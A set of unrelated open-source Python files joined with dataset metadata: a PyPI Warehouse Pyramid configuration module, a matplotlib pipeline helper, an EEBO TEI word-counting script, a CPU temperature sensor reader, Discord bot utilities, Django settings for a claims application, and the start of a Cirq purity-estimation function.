pypa/warehouse | warehouse/config.py | 1 | 19675 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import distutils.util
import enum
import os
import shlex
import transaction
from pyramid import renderers
from pyramid.config import Configurator as _Configurator
from pyramid.response import Response
from pyramid.security import Allow, Authenticated
from pyramid.tweens import EXCVIEW
from pyramid_rpc.xmlrpc import XMLRPCRenderer
from warehouse.errors import BasicAuthBreachedPassword
from warehouse.utils.static import ManifestCacheBuster
from warehouse.utils.wsgi import HostRewrite, ProxyFixer, VhmRootRemover
class Environment(enum.Enum):
production = "production"
development = "development"
class Configurator(_Configurator):
def add_wsgi_middleware(self, middleware, *args, **kwargs):
middlewares = self.get_settings().setdefault("wsgi.middlewares", [])
middlewares.append((middleware, args, kwargs))
def make_wsgi_app(self, *args, **kwargs):
# Get the WSGI application from the underlying configurator
app = super().make_wsgi_app(*args, **kwargs)
# Look to see if we have any WSGI middlewares configured.
for middleware, args, kw in self.get_settings()["wsgi.middlewares"]:
app = middleware(app, *args, **kw)
# Finally, return our now wrapped app
return app
class RootFactory:
__parent__ = None
__name__ = None
__acl__ = [
(Allow, "group:admins", "admin"),
(Allow, "group:moderators", "moderator"),
(Allow, Authenticated, "manage:user"),
]
def __init__(self, request):
pass
def require_https_tween_factory(handler, registry):
if not registry.settings.get("enforce_https", True):
return handler
def require_https_tween(request):
# If we have an :action URL and we're not using HTTPS, then we want to
# return a 403 error.
if request.params.get(":action", None) and request.scheme != "https":
resp = Response("SSL is required.", status=403, content_type="text/plain")
resp.status = "403 SSL is required"
resp.headers["X-Fastly-Error"] = "803"
return resp
return handler(request)
return require_https_tween
def activate_hook(request):
if request.path.startswith(("/_debug_toolbar/", "/static/")):
return False
return True
def commit_veto(request, response):
# By default pyramid_tm will veto the commit anytime request.exc_info is not None,
# we are going to copy that logic with one difference, we are still going to commit
# if the exception was for a BreachedPassword.
# TODO: We should probably use a registry or something instead of hardcoded.
exc_info = getattr(request, "exc_info", None)
if exc_info is not None and not isinstance(exc_info[1], BasicAuthBreachedPassword):
return True
def template_view(config, name, route, template, route_kw=None, view_kw=None):
if route_kw is None:
route_kw = {}
if view_kw is None:
view_kw = {}
config.add_route(name, route, **route_kw)
config.add_view(renderer=template, route_name=name, **view_kw)
def maybe_set(settings, name, envvar, coercer=None, default=None):
if envvar in os.environ:
value = os.environ[envvar]
if coercer is not None:
value = coercer(value)
settings.setdefault(name, value)
elif default is not None:
settings.setdefault(name, default)
def maybe_set_compound(settings, base, name, envvar):
if envvar in os.environ:
value = shlex.split(os.environ[envvar])
kwargs = {k: v for k, v in (i.split("=") for i in value[1:])}
settings[".".join([base, name])] = value[0]
for key, value in kwargs.items():
settings[".".join([base, key])] = value
def configure(settings=None):
if settings is None:
settings = {}
# Add information about the current copy of the code.
maybe_set(settings, "warehouse.commit", "SOURCE_COMMIT", default="null")
# Set the environment from an environment variable, if one hasn't already
# been set.
maybe_set(
settings,
"warehouse.env",
"WAREHOUSE_ENV",
Environment,
default=Environment.production,
)
# Pull in default configuration from the environment.
maybe_set(settings, "warehouse.token", "WAREHOUSE_TOKEN")
maybe_set(settings, "warehouse.num_proxies", "WAREHOUSE_NUM_PROXIES", int)
maybe_set(settings, "warehouse.theme", "WAREHOUSE_THEME")
maybe_set(settings, "warehouse.domain", "WAREHOUSE_DOMAIN")
maybe_set(settings, "forklift.domain", "FORKLIFT_DOMAIN")
maybe_set(settings, "warehouse.legacy_domain", "WAREHOUSE_LEGACY_DOMAIN")
maybe_set(settings, "site.name", "SITE_NAME", default="Warehouse")
maybe_set(settings, "aws.key_id", "AWS_ACCESS_KEY_ID")
maybe_set(settings, "aws.secret_key", "AWS_SECRET_ACCESS_KEY")
maybe_set(settings, "aws.region", "AWS_REGION")
maybe_set(settings, "gcloud.credentials", "GCLOUD_CREDENTIALS")
maybe_set(settings, "gcloud.project", "GCLOUD_PROJECT")
maybe_set(
settings, "warehouse.release_files_table", "WAREHOUSE_RELEASE_FILES_TABLE"
)
maybe_set(settings, "warehouse.trending_table", "WAREHOUSE_TRENDING_TABLE")
maybe_set(settings, "celery.broker_url", "BROKER_URL")
maybe_set(settings, "celery.result_url", "REDIS_URL")
maybe_set(settings, "celery.scheduler_url", "REDIS_URL")
maybe_set(settings, "database.url", "DATABASE_URL")
maybe_set(settings, "elasticsearch.url", "ELASTICSEARCH_URL")
maybe_set(settings, "elasticsearch.url", "ELASTICSEARCH_SIX_URL")
maybe_set(settings, "sentry.dsn", "SENTRY_DSN")
maybe_set(settings, "sentry.frontend_dsn", "SENTRY_FRONTEND_DSN")
maybe_set(settings, "sentry.transport", "SENTRY_TRANSPORT")
maybe_set(settings, "sessions.url", "REDIS_URL")
maybe_set(settings, "ratelimit.url", "REDIS_URL")
maybe_set(settings, "sessions.secret", "SESSION_SECRET")
maybe_set(settings, "camo.url", "CAMO_URL")
maybe_set(settings, "camo.key", "CAMO_KEY")
maybe_set(settings, "docs.url", "DOCS_URL")
maybe_set(settings, "ga.tracking_id", "GA_TRACKING_ID")
maybe_set(settings, "statuspage.url", "STATUSPAGE_URL")
maybe_set(settings, "token.password.secret", "TOKEN_PASSWORD_SECRET")
maybe_set(settings, "token.email.secret", "TOKEN_EMAIL_SECRET")
maybe_set(settings, "token.two_factor.secret", "TOKEN_TWO_FACTOR_SECRET")
maybe_set(
settings,
"warehouse.xmlrpc.search.enabled",
"WAREHOUSE_XMLRPC_SEARCH",
coercer=distutils.util.strtobool,
default=True,
)
maybe_set(settings, "warehouse.xmlrpc.cache.url", "REDIS_URL")
maybe_set(
settings,
"warehouse.xmlrpc.client.ratelimit_string",
"XMLRPC_RATELIMIT_STRING",
default="3600 per hour",
)
maybe_set(settings, "token.password.max_age", "TOKEN_PASSWORD_MAX_AGE", coercer=int)
maybe_set(settings, "token.email.max_age", "TOKEN_EMAIL_MAX_AGE", coercer=int)
maybe_set(
settings,
"token.two_factor.max_age",
"TOKEN_TWO_FACTOR_MAX_AGE",
coercer=int,
default=300,
)
maybe_set(
settings,
"token.default.max_age",
"TOKEN_DEFAULT_MAX_AGE",
coercer=int,
default=21600, # 6 hours
)
maybe_set_compound(settings, "files", "backend", "FILES_BACKEND")
maybe_set_compound(settings, "docs", "backend", "DOCS_BACKEND")
maybe_set_compound(settings, "origin_cache", "backend", "ORIGIN_CACHE")
maybe_set_compound(settings, "mail", "backend", "MAIL_BACKEND")
maybe_set_compound(settings, "metrics", "backend", "METRICS_BACKEND")
maybe_set_compound(settings, "breached_passwords", "backend", "BREACHED_PASSWORDS")
maybe_set_compound(settings, "malware_check", "backend", "MALWARE_CHECK_BACKEND")
# Add the settings we use when the environment is set to development.
if settings["warehouse.env"] == Environment.development:
settings.setdefault("enforce_https", False)
settings.setdefault("pyramid.reload_assets", True)
settings.setdefault("pyramid.reload_templates", True)
settings.setdefault("pyramid.prevent_http_cache", True)
settings.setdefault("debugtoolbar.hosts", ["0.0.0.0/0"])
settings.setdefault(
"debugtoolbar.panels",
[
".".join(["pyramid_debugtoolbar.panels", panel])
for panel in [
"versions.VersionDebugPanel",
"settings.SettingsDebugPanel",
"headers.HeaderDebugPanel",
"request_vars.RequestVarsDebugPanel",
"renderings.RenderingsDebugPanel",
"logger.LoggingPanel",
"performance.PerformanceDebugPanel",
"routes.RoutesDebugPanel",
"sqla.SQLADebugPanel",
"tweens.TweensDebugPanel",
"introspection.IntrospectionDebugPanel",
]
],
)
# Actually setup our Pyramid Configurator with the values pulled in from
# the environment as well as the ones passed in to the configure function.
config = Configurator(settings=settings)
config.set_root_factory(RootFactory)
# Register support for services
config.include("pyramid_services")
# Register metrics
config.include(".metrics")
# Register our CSRF support. We do this here, immediately after we've
# created the Configurator instance so that we ensure to get our defaults
# set ASAP before anything else has a chance to set them and possibly call
# Configurator().commit()
config.include(".csrf")
# Include anything needed by the development environment.
if config.registry.settings["warehouse.env"] == Environment.development:
config.include("pyramid_debugtoolbar")
# Register our logging support
config.include(".logging")
# We'll want to use Jinja2 as our template system.
config.include("pyramid_jinja2")
# Include our filters
config.include(".filters")
# Including pyramid_mailer for sending emails through SMTP.
config.include("pyramid_mailer")
# We want to use newstyle gettext
config.add_settings({"jinja2.newstyle": True})
# Our translation strings are all in the "messages" domain
config.add_settings({"jinja2.i18n.domain": "messages"})
# We also want to use Jinja2 for .html templates as well, because we just
# assume that all templates will be using Jinja.
config.add_jinja2_renderer(".html")
# Sometimes our files are .txt files and we still want to use Jinja2 to
# render them.
config.add_jinja2_renderer(".txt")
# Anytime we want to render a .xml template, we'll also use Jinja.
config.add_jinja2_renderer(".xml")
# We need to enable our Client Side Include extension
config.get_settings().setdefault(
"jinja2.extensions", ["warehouse.utils.html.ClientSideIncludeExtension"]
)
# We'll want to configure some filters for Jinja2 as well.
filters = config.get_settings().setdefault("jinja2.filters", {})
filters.setdefault("format_classifiers", "warehouse.filters:format_classifiers")
filters.setdefault("classifier_id", "warehouse.filters:classifier_id")
filters.setdefault("format_tags", "warehouse.filters:format_tags")
filters.setdefault("json", "warehouse.filters:tojson")
filters.setdefault("camoify", "warehouse.filters:camoify")
filters.setdefault("shorten_number", "warehouse.filters:shorten_number")
filters.setdefault("urlparse", "warehouse.filters:urlparse")
filters.setdefault("contains_valid_uris", "warehouse.filters:contains_valid_uris")
filters.setdefault("format_package_type", "warehouse.filters:format_package_type")
filters.setdefault("parse_version", "warehouse.filters:parse_version")
filters.setdefault("localize_datetime", "warehouse.filters:localize_datetime")
# We also want to register some global functions for Jinja
jglobals = config.get_settings().setdefault("jinja2.globals", {})
jglobals.setdefault("is_valid_uri", "warehouse.utils.http:is_valid_uri")
jglobals.setdefault("gravatar", "warehouse.utils.gravatar:gravatar")
jglobals.setdefault("gravatar_profile", "warehouse.utils.gravatar:profile")
jglobals.setdefault("now", "warehouse.utils:now")
# And some enums to reuse in the templates
jglobals.setdefault(
"RoleInvitationStatus", "warehouse.packaging.models:RoleInvitationStatus"
)
# We'll store all of our templates in one location, warehouse/templates
# so we'll go ahead and add that to the Jinja2 search path.
config.add_jinja2_search_path("warehouse:templates", name=".html")
config.add_jinja2_search_path("warehouse:templates", name=".txt")
config.add_jinja2_search_path("warehouse:templates", name=".xml")
# We want to configure our JSON renderer to sort the keys, and also to use
# an ultra compact serialization format.
config.add_renderer("json", renderers.JSON(sort_keys=True, separators=(",", ":")))
# Configure retry support.
config.add_settings({"retry.attempts": 3})
config.include("pyramid_retry")
# Configure our transaction handling so that each request gets its own
# transaction handler and the lifetime of the transaction is tied to the
# lifetime of the request.
config.add_settings(
{
"tm.manager_hook": lambda request: transaction.TransactionManager(),
"tm.activate_hook": activate_hook,
"tm.commit_veto": commit_veto,
"tm.annotate_user": False,
}
)
config.include("pyramid_tm")
# Register our XMLRPC service
config.include(".legacy.api.xmlrpc")
# Register our XMLRPC cache
config.include(".legacy.api.xmlrpc.cache")
# Register support for XMLRPC and override it's renderer to allow
# specifying custom dumps arguments.
config.include("pyramid_rpc.xmlrpc")
config.add_renderer("xmlrpc", XMLRPCRenderer(allow_none=True))
# Register support for our legacy action URLs
config.include(".legacy.action_routing")
# Register support for our domain predicates
config.include(".domain")
# Register support for template views.
config.add_directive("add_template_view", template_view, action_wrap=False)
# Register support for internationalization and localization
config.include(".i18n")
# Register the configuration for the PostgreSQL database.
config.include(".db")
# Register the support for Celery Tasks
config.include(".tasks")
# Register support for our rate limiting mechanisms
config.include(".rate_limiting")
config.include(".static")
config.include(".policy")
config.include(".search")
# Register the support for AWS and Google Cloud
config.include(".aws")
config.include(".gcloud")
# Register our session support
config.include(".sessions")
# Register our support for http and origin caching
config.include(".cache.http")
config.include(".cache.origin")
# Register support for sending emails
config.include(".email")
# Register our authentication support.
config.include(".accounts")
# Register support for Macaroon based authentication
config.include(".macaroons")
# Register support for malware checks
config.include(".malware")
# Register logged-in views
config.include(".manage")
# Allow the packaging app to register any services it has.
config.include(".packaging")
# Configure redirection support
config.include(".redirects")
# Register all our URL routes for Warehouse.
config.include(".routes")
# Include our admin application
config.include(".admin")
# Register forklift, at least until we split it out into it's own project.
config.include(".forklift")
# Block non HTTPS requests for the legacy ?:action= routes when they are
# sent via POST.
config.add_tween("warehouse.config.require_https_tween_factory")
# Enable compression of our HTTP responses
config.add_tween(
"warehouse.utils.compression.compression_tween_factory",
over=[
"warehouse.cache.http.conditional_http_tween_factory",
"pyramid_debugtoolbar.toolbar_tween_factory",
EXCVIEW,
],
)
# Enable Warehouse to serve our static files
prevent_http_cache = config.get_settings().get("pyramid.prevent_http_cache", False)
config.add_static_view(
"static",
"warehouse:static/dist/",
# Don't cache at all if prevent_http_cache is true, else we'll cache
# the files for 10 years.
cache_max_age=0 if prevent_http_cache else 10 * 365 * 24 * 60 * 60,
)
config.add_cache_buster(
"warehouse:static/dist/",
ManifestCacheBuster(
"warehouse:static/dist/manifest.json",
reload=config.registry.settings["pyramid.reload_assets"],
strict=not prevent_http_cache,
),
)
config.whitenoise_serve_static(
autorefresh=prevent_http_cache,
max_age=0 if prevent_http_cache else 10 * 365 * 24 * 60 * 60,
)
config.whitenoise_add_files("warehouse:static/dist/", prefix="/static/")
config.whitenoise_add_manifest(
"warehouse:static/dist/manifest.json", prefix="/static/"
)
# Enable support of passing certain values like remote host, client
# address, and protocol support in from an outer proxy to the application.
config.add_wsgi_middleware(
ProxyFixer,
token=config.registry.settings["warehouse.token"],
num_proxies=config.registry.settings.get("warehouse.num_proxies", 1),
)
# Protect against cache poisoning via the X-Vhm-Root headers.
config.add_wsgi_middleware(VhmRootRemover)
# Fix our host header when getting sent upload.pypi.io as a HOST.
# TODO: Remove this, this is at the wrong layer.
config.add_wsgi_middleware(HostRewrite)
# We want Sentry to be the last things we add here so that it's the outer
# most WSGI middleware.
config.include(".sentry")
# Register Content-Security-Policy service
config.include(".csp")
# Register Referrer-Policy service
config.include(".referrer_policy")
config.add_settings({"http": {"verify": "/etc/ssl/certs/"}})
config.include(".http")
# Add our theme if one was configured
if config.get_settings().get("warehouse.theme"):
config.include(config.get_settings()["warehouse.theme"])
# Scan everything for configuration
config.scan(
ignore=["warehouse.migrations.env", "warehouse.celery", "warehouse.wsgi"]
)
# Sanity check our request and responses.
# Note: It is very important that this go last. We need everything else that might
# have added a tween to be registered prior to this.
config.include(".sanity")
# Finally, commit all of our changes
config.commit()
return config
| apache-2.0 | 6,571,984,484,653,794,000 | 36.54771 | 88 | 0.67385 | false |
garywu/pypedream | pypedream/plot/_filt.py | 1 | 2685 | import numpy
has_matplotlib = True
try:
from matplotlib import pyplot, figure
except ImportError:
has_matplotlib = False
from dagpype._core import filters
def _make_relay_call(fn, name):
def new_fn(*args, **kwargs):
@filters
def _dagpype_internal_fn_act(target):
try:
while True:
target.send((yield))
except GeneratorExit:
fn(*args, **kwargs)
target.close()
return _dagpype_internal_fn_act
new_fn.__name__ = name
new_fn.__doc__ = """
Convenience filter utility for corresponding function in pyplot.
Example:
>>> source([1, 2, 3, 4]) | plot.xlabel('x') | plot.ylabel('y') | plot.title('xy') | (plot.plot() | plot.savefig('foo.png'))
"""
return new_fn
_try_fns = [
'annotate',
'arrow',
'autogen_docstring',
'autoscale',
'autumn',
'axes',
'axhline',
'axhspan',
'axis',
'axvline',
'axvspan',
'barbs',
'bone',
'box',
'broken_barh',
'cla',
'clabel',
'clf',
'clim',
'cm',
'cohere',
'colorbar',
'colormaps',
'colors',
'connect',
'cool',
'copper',
'csd',
'dedent',
'delaxes',
'docstring',
'draw',
'figaspect',
'figimage',
'figlegend',
'figtext',
'figure',
'fill',
'fill_between',
'fill_betweenx',
'flag',
'gca',
'gcf',
'gci',
'get',
'gray',
'grid',
'hold',
'hot',
'hsv',
'jet',
'locator_params',
'margins',
'minorticks_off',
'minorticks_on',
'normalize',
'over',
'pcolor',
'pcolormesh',
'pink',
'plotfile',
'plotting',
'polar',
'prism',
'psd',
'quiver',
'quiverkey',
'rc',
'register_cmap',
'rgrids',
'sca',
'sci',
'set_cmap',
'setp',
'silent_list',
'specgram',
'spectral',
'spring',
'spy',
'stem',
'step',
'subplot',
'subplot2grid',
'subplot_tool',
'subplots',
'subplots_adjust',
'summer',
'suptitle',
'table',
'text',
'thetagrids',
'tick_params',
'ticklabel_format',
'tight_layout',
'title',
'tricontour',
'tricontourf',
'tripcolor',
'triplot',
'twinx',
'twiny',
'winter',
'xlabel',
'xlim',
'xscale',
'xticks',
'ylabel',
'ylim',
'yscale',
'yticks']
_fns = []
if has_matplotlib:
for fn in _try_fns:
try:
exec('%s = _make_relay_call(pyplot.%s, "%s")' % (fn, fn, fn))
_fns.append(fn)
except AttributeError:
pass
| bsd-3-clause | -3,559,330,889,597,093,000 | 16.211538 | 131 | 0.480447 | false |
ericleasemorgan/EEBO-TCP-Workset-Browser | bin/make-index.py | 1 | 2042 | #!/usr/bin/env python
# make-index.py - read EEBO TEI files and output word frequencies as well as a "book"
# Eric Lease Morgan <[email protected]>
# June 8, 2015 - first investigations; bases on HathiTrust work
# configure
STOPWORDS = './etc/stopwords-en.txt'
# require
import operator
import re
import sys
import libxml2
# sanity check
if ( len( sys.argv ) != 2 ) | ( sys.stdin.isatty() ) :
print "Usage: cat <xml> |", sys.argv[ 0 ], '<-b|-d>'
quit()
# get input; sanity check
flag = sys.argv[ 1 ]
# build a book?
if flag == '-b' : build_book = 1
elif flag == '-d' : build_book = 0
else :
print "Usage: cat <xml> |", sys.argv[ 0 ], '<-b|-d>'
quit()
# create an xpath parser with an xml file
xml = sys.stdin.read()
tei = libxml2.parseMemory( xml, len( xml ) )
context = tei.xpathNewContext()
context.xpathRegisterNs( 't', 'http://www.tei-c.org/ns/1.0' )
# parse
title = context.xpathEval( '/t:TEI/t:teiHeader/t:fileDesc/t:titleStmt/t:title/text()' )[ 0 ]
text = context.xpathEval( '/t:TEI/t:text' )[ 0 ].content
# normalize the text
text = re.sub( '\s+', ' ', text )
text = text.lower()
text = text.split()
# initialize output
words = {}
book = str( title ) + '\n'
# create a list of (English) stopwords
stopwords = {}
with open ( STOPWORDS ) as DATABASE :
for record in DATABASE : stopwords[ record.rstrip() ] = 1
# process each word in the text
for word in text :
# normalize some more; probably not 100% accurate
word = word.rstrip( '?:!.,;)' )
word = word.lstrip( '?:!.,;(' )
# filter out unwanted words
if len( word ) < 2 : continue
if re.match( '\d|\W', word ) : continue
if word in stopwords : continue
# build text file
if build_book : book = book + word + ' '
# or update the dictionary
else : words[ word ] = words.get( word, 0 ) + 1
# output book, or
if build_book : print book
# output the dictionary
else :
for tuple in sorted( words.items(), key=operator.itemgetter( 1 ), reverse=True ) :
print( tuple[ 0 ] + '\t' + str( tuple[ 1 ] ) )
# done
quit()
| gpl-2.0 | -2,400,946,947,724,106,000 | 22.744186 | 92 | 0.629285 | false |
mmcbride1/python-coretemp | coretemp/sensor_reading.py | 1 | 4790 | import re
import os
import sys
import subprocess
import sensors as r
import coretemp_log as log
import coretemp_config as conf
from collections import OrderedDict
''' Get sensor constants '''
from coretemp_constants import SUB_MAX_TYPE, SUB_CRT_TYPE, CHIP, NORM, HIGH, CRTC
class SensorReading:
''' Store sensor threshold '''
crit = []
high = []
''' Store log message '''
MSG = ""
''' Store sensor reading '''
read = OrderedDict()
''' Configuration '''
CONF = conf.Config("threshold").get_config()
ERRO = log.ExceptionLog()
def __init__(self):
"""
Constructor:
Set chip reading and log
message
"""
try:
self.__set_chip_read()
self.__set_message()
except Exception as ex:
self.ERRO.update_errlog(ex)
def get_reading(self):
"""
Get sensor reading
:return: sensor reading
"""
return self.read
def get_message(self):
"""
Get log message
:return: log message string
"""
return self.MSG
def get_failed(self):
"""
Get readings only deemed
as high or critical from
the primary reading
:return: max/crt message string
"""
return re.sub(".*NORMAL.*\n?","",self.MSG)
def __collect_recommended(self, sub):
"""
Gets the recommended threshold
values as determined by the
sensor sub-feature set
:param str sub: the given sub-feature
"""
self.sub = sub
num = sub.get_value()
if sub.type == SUB_MAX_TYPE:
self.high.append(num)
if sub.type == SUB_CRT_TYPE:
self.crit.append(num)
def __avg(self, arr):
"""
Obtains the mean value
of the collection
:param list arr: any given list
:return: average value
"""
self.arr = arr
try:
avg = sum(arr)/float(len(arr))
return round(avg, 2)
except ZeroDivisionError as z:
self.ERRO.update_errlog(z)
return 0
def get_avg_read(self):
"""
Gets the average core value
of the list of chips on the
read
:return: average core value
"""
return self.__avg(self.read.values())
def __msg_str(self, k, v, i):
"""
Helper function to
build the log output message
:param str k: core #
:param str v: reading
:param str i: indicator
:return: formatted log message
"""
self.k = k
self.v = v
self.i = i
return "%s : %s -> %s\n" % (k, v, i)
def __set_defaults(self, arr):
"""
Sets default values for
the thresholds in the case that
none are provided in the config and
a reading cannot be obtained from
the chip
:param list arr: generated threshold list
:return: updated list with defaults
"""
self.arr = arr
for k, v in arr.items():
if k is 'MAX' and v == 0:
arr[k] = 86.0
if k is 'CRT' and v == 0:
arr[k] = 96.0
return arr
def get_threshold(self):
"""
The primary threshold setting
mechanism. Sets first from the
config then next from the recommended
values if no such properties exist
:return: dict containing max/crt values
"""
h = self.CONF['high']
c = self.CONF['crit']
if h is "" or float(h) <= 0:
h = self.__avg(self.high)
if c is "" or float(c) <= 0:
c = self.__avg(self.crit)
order = [float(h),float(c)]
high = min(order)
crit = max(order)
return {'MAX':high,'CRT':crit}
def __set_chip_read(self):
"""
Queries the chip applies result
to the 'read' dict. Then, collects the
recommended threshold values
"""
r.init()
try:
for x in r.iter_detected_chips(CHIP):
for f in x:
if "Core" in f.label:
self.read[f.label] = f.get_value()
for sub in f:
self.__collect_recommended(sub)
finally:
r.cleanup()
def __set_message(self):
"""
Builds the output (log) message
based on the standing of the chip
read and whether given thresholds
were reached
"""
th = self.__set_defaults(self.get_threshold())
for k, v in self.get_reading().items():
if v < th['MAX']:
self.MSG += self.__msg_str(k,v,NORM)
elif v >= th['MAX'] and v < th['CRT']:
self.MSG += self.__msg_str(k,v,HIGH)
elif v >= th['CRT']:
self.MSG += self.__msg_str(k,v,CRTC)
else:
self.MSG += self.__msg_str(k,v,"UNKNOWN")
| mit | 2,297,865,307,303,243,800 | 23.564103 | 81 | 0.532777 | false |
inexactually/irisbot | utils.py | 1 | 2817 | import aiohttp
import inspect
import io
import discord
from discord.ext import commands
import settings
def setting(name, default):
return getattr(settings, name, default)
def pretty_list(names, bold=True, conjunction='and', empty=''):
names = list(names)
if not names:
return empty
if bold:
names = ['**{}**'.format(name) for name in names]
sep = ' ' + conjunction if conjunction else ''
if len(names) == 1:
return names[0]
elif len(names) == 2:
return '{}{} {}'.format(names[0], sep, names[1])
else:
return '{},{} {}'.format(', '.join(names[:-1]), sep, names[-1])
def is_local_check_failure(error):
"""This horrible hack lets a command error handler figure out if the
error originates from the command's own checks, rather than a
global check or some other sort of error.
"""
if isinstance(error, commands.CheckFailure):
if error.args:
return "check functions for command" in error.args[0]
# Copied from discord.ext.commands.bot.py. We need this because
# there's no way to override the formatting of the defualt Bot.reply.
def bot_get_variable(name):
stack = inspect.stack()
try:
for frames in stack:
try:
frame = frames[0]
current_locals = frame.f_locals
if name in current_locals:
return current_locals[name]
finally:
del frame
finally:
del stack
class Bot(commands.Bot):
"""A subclass of `discord.ext.commands.Bot` with some improvements.
"""
async def reply(self, content, *args, separator=' ', **kwargs):
# Now with custom separator support
author = bot_get_variable('_internal_author')
text = '{0.mention}{1}{2}'.format(author, separator, str(content))
return await self.say(text, *args, **kwargs)
async def send_file(self, destination, fp, *, filename=None, content=None, embed=None, tts=False):
# Now with embed support
channel_id, guild_id = await self._resolve_destination(destination)
if embed is not None:
embed = embed.to_dict()
try:
with open(fp, 'rb') as f:
buffer = io.BytesIO(f.read())
if filename is None:
_, filename = path_split(fp)
except TypeError:
buffer = fp
content = str(content) if content is not None else None
data = await self.http.send_file(channel_id, buffer, guild_id=guild_id,
filename=filename, content=content, embed=embed, tts=tts)
channel = self.get_channel(data.get('channel_id'))
message = self.connection._create_message(channel=channel, **data)
return message
| mit | 5,766,240,977,364,690,000 | 33.353659 | 102 | 0.599219 | false |
censof/ansible-deployment | django_app_server_db_server/deployment/templates/common.py | 1 | 3942 | import os.path
# Configuration modules.
from ._installed_apps import *
from ._middleware import *
from ._context_processors import *
from ._email import *
from ._eclaim import *
_ = lambda s: s
# Debugging mode.
DEBUG = False
TEMPLATE_DEBUG = False
if DEMO_MODE:
SEND_NOTIF_EMAILS = False
else:
SEND_NOTIF_EMAILS = True
# Project root directory.
_path = os.path.join(os.path.dirname(__file__), os.pardir)
BASE_DIR = os.path.abspath(os.path.join(_path, os.pardir))
# SQL scripts directory.
_parpath = os.path.join(BASE_DIR, os.pardir)
SQL_SCRIPTS_DIR = os.path.abspath(os.path.join(_parpath, 'sql_scripts'))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'wk9&6^ns(71^*i#8&=v#j53-cv#85csvl53zu4dp$w0x(k%zsz'
ALLOWED_HOSTS = ['{{ ansible_eth0.ipv4.address }}']
if DEMO_MODE:
HOST_URL = 'http://{{ ansible_eth0.ipv4.address }}:{}/'.format(DEMO_PORT)
else:
HOST_URL = 'http://{{ ansible_eth0.ipv4.address }}/'
LOGIN_URL = '/eclaim/login/'
ROOT_URLCONF = 'eclaim.urls'
WSGI_APPLICATION = 'wsgi.application'
# Absolute path to the directory that holds static files.
STATIC_ROOT = '{{ django_app_home }}/static_files'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
# Compress static files.
COMPRESS_ENABLED = True
# Absolute path to the directory that holds media files.
MEDIA_ROOT = '{{ django_app_home }}/media_files'
MEDIA_URL = '/media/'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(BASE_DIR, 'templates'),
)
# Django Rest Framework.
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 100
}
MINI_PAGE_SIZE = 20
# Sphinx documentation.
DOCS_ROOT = os.path.join(BASE_DIR, 'docs/_build/html')
DOCS_ACCESS = 'login_required' # public/login_required/staff/superuser
# Internationalization.
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en'
LANGUAGES = (
('en', _('English')),
('ms', _('Bahasa Malaysia')),
)
LOCALE_PATHS = (
os.path.join(BASE_DIR, 'locale'),
)
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# JavaScript Internationalization (i18n)
JS_I18N_PACKAGES = (
'eclaim.masterfiles',
'eclaim.settings'
)
# Caching.
CACHE_TIMEOUT = 7 * 86400 # 7 days
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': os.path.join(BASE_DIR, 'cache'),
'TIMEOUT': CACHE_TIMEOUT
},
}
# Logging.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt': "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.handlers.RotatingFileHandler',
'filename': os.path.abspath('eclaim.log'),
'formatter': 'verbose'
},
},
'loggers': {
'django': {
'handlers': ['file'],
'propagate': True,
'level': 'DEBUG',
},
'ECLAIM': {
'handlers': ['file'],
'level': 'DEBUG',
},
}
}
| mit | -4,356,248,494,672,155,600 | 22.746988 | 88 | 0.627093 | false |
quantumlib/Cirq | cirq-core/cirq/experiments/purity_estimation.py | 1 | 2467 | # Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Sequence
import numpy as np
def purity_from_probabilities(
hilbert_space_dimension: int,
probabilities: Sequence[float],
) -> float:
"""Purity estimator from speckle purity benchmarking.
Estimates purity from empirical probabilities of observed bitstrings.
This estimator assumes that the circuit used in experiment is sufficiently
scrambling that its output probabilities follow the Porter-Thomas
distribution. This assumption holds for typical instances of random quantum
circuits of sufficient depth.
The state resulting from the experimental implementation of the circuit
is modeled as
ρ = p |𝜓⟩⟨𝜓| + (1 - p) I / D
where |𝜓⟩ is a pure state, I / D is the maximally mixed state, and p is
between 0 and 1. The purity of this state is given by p**2. If p = 1, then
the bitstring probabilities are modeled as being drawn from the
Porter-Thomas distribution, with probability density function given by
f(x) = (D - 1) (1 - x)**(D - 2).
The mean of this distribution is 1 / D and its variance is
(D - 1) / [D**2 (D + 1)]. In general, the variance of the distribution
is multipled by p**2. Therefore, the purity can be computed by dividing
the variance of the empirical probabilities by the Porter-Thomas
variance (D - 1) / [D**2 (D + 1)].
